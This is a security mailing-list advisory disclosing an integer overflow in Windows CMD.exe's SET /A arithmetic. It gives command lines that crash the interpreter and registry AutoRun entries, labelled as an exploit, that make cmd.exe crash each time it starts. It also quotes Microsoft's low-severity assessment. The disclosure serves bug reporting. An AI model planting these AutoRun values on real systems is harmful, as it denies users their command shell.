lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Tue, 10 May 2022 17:01:51 +0200
From: "Stefan Kanthak" <stefan.kanthak@...go.de>
To: <fulldisclosure@...lists.org>
Cc: bugtraq@...urityfocus.com
Subject: [FD] Defense in depth -- the Microsoft way (part 80): 25 (in words:
	TWENTY-FIVE) year old TRIVIAL bug crashes CMD.exe

Hi @ll,

the subject says it all: a 25 year old TRIVIAL signed integer
arithmetic bug (which may well have earned a PhD now) crashes
Windows' command interpreter CMD.exe via its builtin SET command.
See their documentation:
<https://technet.microsoft.com/en-us/library/cc771320.aspx>
<https://technet.microsoft.com/en-us/library/cc754250.aspx>


Classification
~~~~~~~~~~~~~~

<https://cwe.mitre.org/data/definitions/190.html>
CWE-190: Integer Overflow or Wraparound

<https://cwe.mitre.org/data/definitions/248.html>
CWE-248: Uncaught Exception


Demonstration
~~~~~~~~~~~~~

On Windows NT4 or any newer version start the command interpreter and
run the following 4 command lines (the first 3 set just the base):

SET /A -2147483648
SET /A ~2147483647
SET /A ~2147483647 / -1
SET /A ~2147483647 % -1

[1] Oops: although a valid signed 32-bit integer, the command interpreter
          reports the literal value -2147483648 = 2**31 alias INT_MIN as
          "Invalid number. Numbers are limited to 32-bits of precision."

[2] As expected, ~2147483647, the negation of INT_MAX, yields INT_MIN

[3] Also as expected, computing the quotient of INT_MIN / -1 produces
    "Invalid number. Numbers are limited to 32-bits of precision.": the
    correct result is +2147483648 alias INT_MAX + 1, i.e. produces a
    integer overflow, which raises a #DE (divide error) exception on
    x86/x64 processors (and their 8- and 16-bit predecessors too).

[4] OUCH: rather unexpected, computing the remainder of INT_MIN / -1
          crashes the command processor with the #DE exception, i.e.
          the developers failed to implement the check they used for
          division.

JFTR: the remainder of <any integer> % -1 as well as <any integer> % 1
      is (by the algebraic definition of division) 0 (in words: ZERO):
      the remainder is in magnitude less than the divisor.
      The only integer that is in magnitude less than |-1| = 1 is 0!


Exploit
~~~~~~~

Setting one or both of the following documented registry entries
crashes the command interpreter upon invocation (unless started
with the switch /D):

[HKEY_CURRENT_USER\Software\Microsoft\Command Processor]
"AutoRun"="SET /A ~2147483647 % ~0"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]
"AutoRun"="SET /A ~2147483647 % ~0"


stay tuned
Stefan Kanthak

PS: I reported this bug as DoS to the MSRC; they replied with the
    following bullshit statement in their 2nd sentence:

| Though engineering confirmed the crash in this case, it was assessed
| as a Low severity DoS.
| Their reasoning centers around the requirement to have admin
| privileges to pull off the attack.

    OUCH! Unprivileged users can but write this registry entry below
          [HKEY_CURRENT_USER\Software\Microsoft\Command Processor]
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists